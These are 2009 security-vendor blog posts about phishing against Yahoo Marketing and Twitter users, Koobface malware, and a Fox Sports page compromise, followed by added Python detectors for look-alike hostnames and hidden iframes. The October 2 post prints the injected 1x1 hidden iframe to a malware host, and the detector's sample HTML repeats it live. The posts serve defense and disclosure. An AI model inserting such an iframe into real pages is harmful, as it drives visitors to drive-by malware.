Friday, October 23, 2009

Phishing Criminals Take Aim at Yahoo Ad Services

Yahoo! Marketing users are the target of a new phishing scam detected today by the eSoft Threat Prevention Team. Webmasters receive a very believable notification that their Yahoo! Marketing account has expired, with a link to log in and presumably reactivate the account.

If the user follows the link, they are presented with an authentic-looking login page where the credential theft takes place. The username and password entered there are delivered to the attackers for further exploitation. With these credentials, criminals can hijack paid advertisements, replacing legitimate ads with their own malicious links or code.

The “hook” in this scam is a classic warning of impending account closure. The domain serving the phishing page was registered only today but has an authentic ring to it, and the URLs put a marketingsolutions.yahoo prefix in the subdomain so that a casual glance at the address bar reads like the real Yahoo! site. The part of the hostname that actually decides who controls the site is the registered domain at the right-hand end, not the familiar-looking labels to its left.
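The check below, added here as an example and not eSoft's own tooling, makes that point mechanical: it splits a hostname into the registrable domain and everything to its left, then reports whether the brand name is the registrable domain, merely a subdomain label, a look-alike registrable name, or absent. The phishing domain itself is not given on this page, so the sample URLs are constructed; the registrable-domain split assumes a two-label domain such as brand.com, which is a simplification (a production tool should use the Public Suffix List).

```python
"""Where does a brand name sit in a URL's hostname?  Added example, not eSoft's tooling."""
from urllib.parse import urlparse


def registrable_domain(hostname):
    """Last two labels of the host.

    Assumption: brand.com-style domains only; hosts under suffixes such as
    .co.uk need the Public Suffix List to be split correctly.
    """
    labels = hostname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def brand_position(url, brand):
    """Classify where `brand` appears in the URL's hostname.

      'registrable' - the brand IS the registrable domain (marketingsolutions.yahoo.com)
      'lookalike'   - the registrable label merely contains the brand (yahoo-renewal.com)
      'subdomain'   - the brand appears only left of the registrable domain
      'absent'      - the brand does not appear in the hostname at all

    Only 'registrable' is consistent with the brand actually controlling the site.
    """
    host = urlparse(url).hostname
    if not host:
        return "absent"
    brand = brand.lower()
    reg = registrable_domain(host)
    reg_label = reg.split(".")[0]
    if reg_label == brand:
        return "registrable"
    if brand in reg_label:
        return "lookalike"
    # Everything left of the registrable domain is attacker-chosen on a phishing host.
    subdomain = host.lower()[: -len(reg)].rstrip(".")
    if brand in subdomain:
        return "subdomain"
    return "absent"


def looks_like_phish(url, brand):
    """True when the brand is invoked in the hostname without owning the registrable domain."""
    return brand_position(url, brand) in ("lookalike", "subdomain")


if __name__ == "__main__":
    # Constructed URLs: the real phishing domain from the campaign is not reproduced here.
    for u in ("http://marketingsolutions.yahoo.example-newreg.com/login",
              "https://marketingsolutions.yahoo.com/",
              "http://yahoo-account-renewal.com/"):
        print(u, "->", brand_position(u, "yahoo"), "| phish?", looks_like_phish(u, "yahoo"))
```

The same split applies to the Twitter lure further down this page: videos.dskjkiuw.com does not mention the brand at all, so the hostname gives no false reassurance, and the only tell is the login form itself.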




At the time of detection, none of the major search engines or public phishing lists flagged this URL as malicious.

Wednesday, October 21, 2009

Compromised Web Servers Host Koobface Malware Cocktail

The Koobface gang has struck again, using compromised web servers to deliver a potent mix of malware. eSoft threat researchers have found hundreds of newly exploited sites hosting malware that includes downloaders, keyloggers and multiple variants of the Koobface worm.

Attackers who use compromised sites to deliver their malware stand a better chance of evading web filters, since those sites are generally already categorized as "safe". The constant churn of the malware binaries also keeps anti-virus detection rates low.

eSoft has noted a constant stream of new malware files coming from these sites.

Koobface is a social networking worm that spreads through social engineering. Users typically receive a link to a supposed video. After clicking the link, the user is prompted to update their Flash Player or download a codec in order to view the video. Users who have not been trained to be skeptical of such requests follow the directions, infecting their machine and allowing the worm to spread through whatever social networks the local user's accounts give it access to, targeting the infected user's friends, family and business contacts. This social aspect is central to the lure and the reason it is so successful: the video might require a download to view, but it came from a close friend, so it is probably fine.

The keyloggers hosted on the compromised sites can be used to steal any kind of sensitive personal information. Koobface itself will often steal login credentials for social networking sites, which it then uses to send more messages and infect more machines.

The compromised sites in this attack are in a format that looks something like this:

eSoft is flagging these sites as 'Compromised'.

Friday, October 16, 2009

Unresolved Compromised Fox Sports Host Heading Into Third Week

eSoft first detected a compromise on the Fox Sports website two weeks ago, and as of today at least one Fox Sports host still contains automatic links to a multitude of dangerous exploits. Even with media coverage and direct emails, this compromised host has not been taken offline or cleaned. The hosted threats have rotated, the most recent being remote script links to ackworld.com and nt002.cn.

akcworld.com has been hosting a multitude of Gumblar exploited pages that are leading to dangerous trojans.


nt002.cn has been hosting a variety of exploits, most recently targeting the Microsoft Video ActiveX Control vulnerabilities.



We hope that with further attention and pressure, the Fox Sports administrators will address this problem before another week passes.

Wednesday, October 14, 2009

Fresh Twitter Phishing Campaign via Direct Messages and Tweets

A fresh Twitter phishing campaign is underway, using both tweets and direct messages to spread. The messages contain text such as “hah, I think I seen u on here” and “wow you look different on here” together with a link to a video. The URL hxxp://videos.dskjkiuw.com is one of those in use. At this time, eSoft is not detecting malware or exploits on this domain, but the target page presents a good imitation of the Twitter login page in an attempt to steal credentials. As such, eSoft has flagged it as “Phishing & Fraud.” The Threat Prevention Team will keep a close eye on developments. Below is a series of screenshots starting with an example direct message and leading to the fake login page and the series of pages that come up after entering bogus username and password information.

Wednesday, October 7, 2009

Update on Fox Sports Website Infection

Quick update on this threat: as of today, 10/7/09, the Fox Sports website is still compromised. The specific URL, hxxp://msndr.foxsports.com/, has been cleaned, but requesting any nonexistent path on that host returns a 404 page that still carries the malicious iframe to thingre.com. For example, hxxp://msndr.foxsports.com/dffdd returns a malicious page leading visitors to malware. This is why checking only the pages originally reported is not enough: the injected code lives in the server's error template, so every unknown URL on the host serves it. eSoft has not received any response from Fox Sports, and the classification of the msndr.foxsports.com host remains "Compromised."

Monday, October 5, 2009

Millions At Risk Visiting Popular Sports Site

The Fox Sports website remains infected and a risk to its 6m+ visitors (as reported by Compete). This website, ranked as the 75th most popular website in the United States and 311th most popular in the world according to Alexa, remains compromised and a major security risk to end users. eSoft first reported on this threat on Friday, October 2nd, but was incorrect in saying that the infection had been cleaned up. [Clarification: the specific pages eSoft examined were cleaned, but other pages have since been found to still be compromised.] As of today, certain pages on the Fox Sports site remain infected. The eSoft team has written to the webmaster at Fox Sports (along with all contacts listed in their whois records) with details that we hope will help their team clean up the website. When we hear back from them, we will post an update here.

Note that the malware being delivered through this threat remains undetected by the vast majority of anti-virus software. Also note that the compromised pages are being served through the Akamai network, although at this time we believe the threat is specific to Fox Sports and not to Akamai. Here is part of the email sent to Fox Sports by the eSoft team:

To Whom It May Concern:

eSoft has detected that your website, msndr.foxsports.com, remains infected with a dangerous, hidden iframe that links to a site that uses a variety of exploits to infect your website visitors with one of several rotating trojans. In particular, your 404 Page Not Found page on that server has the iframe right at the end of the HTML document, immediately before the </body> tag. See attached screenshot. Unfortunately, eSoft cannot say how your site was compromised, only that it is compromised and the compromised pages are being served through your Akamai distribution network. At this time, eSoft has marked msndr.foxsports.com as a Compromised site and millions of end users are currently blocking access to the site based on that determination. Please let us know when you have corrected the issue so that we may unblock your site.


Friday, October 2, 2009

Foxsports.com Used to Serve Malware

eSoft's Threat Prevention Lab detected malicious code on the foxsports.com website late yesterday. Hackers have once again added a well-known website to the tally of sites recently exploited to serve dangerous content.

The popular sports website was used to transparently redirect visitors to a dangerous site that regularly hosts malware. The compromised page contained a hidden iframe that retrieved content from the malicious site, so a visitor's browser fetched the attacker's page without anything visible changing.

The URL used for the attack was part of the Fantasy Baseball Hot Streak game. Hot Streak Fantasy Baseball users should check their machines for any signs of infection or malicious activity.



The URL hxxp://msn.foxsports.com/fantasy/baseball/hotstreak/external/ contained the hidden iframe below, accessing content at hxxp://thingre.com/in.php.

<iframe src="hxxp://thingre.com/in.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
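A check of the kind a webmaster could run against their own pages, including the 404 error page described in the October 7 update and in the email above, is shown below. It is an added example, not eSoft's or Fox Sports' code. It parses a constructed 404 page modelled on that description (a legitimate on-site widget plus the 1x1 hidden iframe placed immediately before </body>) and reports iframes that both point off-site and are concealed by a tiny size or a hiding style. The HTML, the on-site widget URL and the hostnames are constructed for the example; the on-site test compares the last two labels of the page host, which is a simplification (a production tool should use the Public Suffix List).

```python
"""Flag hidden iframes that load off-site content (added example, not eSoft tooling)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): v for k, v in attrs})


def _tiny(value):
    """True for width/height attribute values of 0..2 pixels (the classic 1x1 frame)."""
    m = re.match(r"\s*(\d+)", value or "")
    return m is not None and int(m.group(1)) <= 2


def _hidden_style(style):
    """True if the inline style conceals the element."""
    s = (style or "").lower().replace(" ", "")
    return ("visibility:hidden" in s or "display:none" in s
            or re.search(r"(?:^|;)(?:width|height):0*[0-2](?:px)?(?:;|$)", s) is not None)


def _off_site(src, page_host):
    """Heuristic: off-site unless the iframe host shares the page host's last two labels.

    Assumption: two-label registrable domains; use the Public Suffix List in real tooling.
    """
    host = urlparse(src).hostname
    if host is None:  # relative src resolves to the page's own host
        return False
    base = ".".join(page_host.lower().split(".")[-2:])
    return not (host == base or host.endswith("." + base))


def find_hidden_iframes(html, page_host):
    """Return [(src, [reasons])] for iframes that are both off-site and concealed."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src")
        if not src or not _off_site(src, page_host):
            continue
        reasons = []
        for dim in ("width", "height"):
            if _tiny(attrs.get(dim)):
                reasons.append(f"{dim}={attrs[dim]}")
        if _hidden_style(attrs.get("style")):
            reasons.append("style conceals element")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed 404 page modelled on the description of msndr.foxsports.com: one visible
# on-site widget (invented URL) plus the 1x1 hidden iframe just before </body>.
SAMPLE_404 = """<html><head><title>404 Not Found</title></head>
<body>
<h1>Page Not Found</h1>
<iframe src="http://msn.foxsports.com/widget/scores" width="300" height="250"></iframe>
<iframe src="http://thingre.com/in.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
</body></html>"""

# Constructed clean error page for comparison.
CLEAN_404 = """<html><body><h1>Page Not Found</h1></body></html>"""

if __name__ == "__main__":
    for src, why in find_hidden_iframes(SAMPLE_404, "msndr.foxsports.com"):
        print(f"hidden off-site iframe -> {src} ({', '.join(why)})")
```

Run it against a request for a path that does not exist on the host as well as against the front page; as the October 7 update notes, the front page had been cleaned while the error template still carried the frame.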

The redirect domain thingre.com has a poor reputation, not only with eSoft but also with Google, Web of Trust and multiple URL blocklists.



The page can no longer be viewed on the Fox Sports website, and the file on the malicious site has been removed. The last malware known to be hosted at the site was a trojan.dropper variant, and the payload delivered last night is assumed to be more of the same.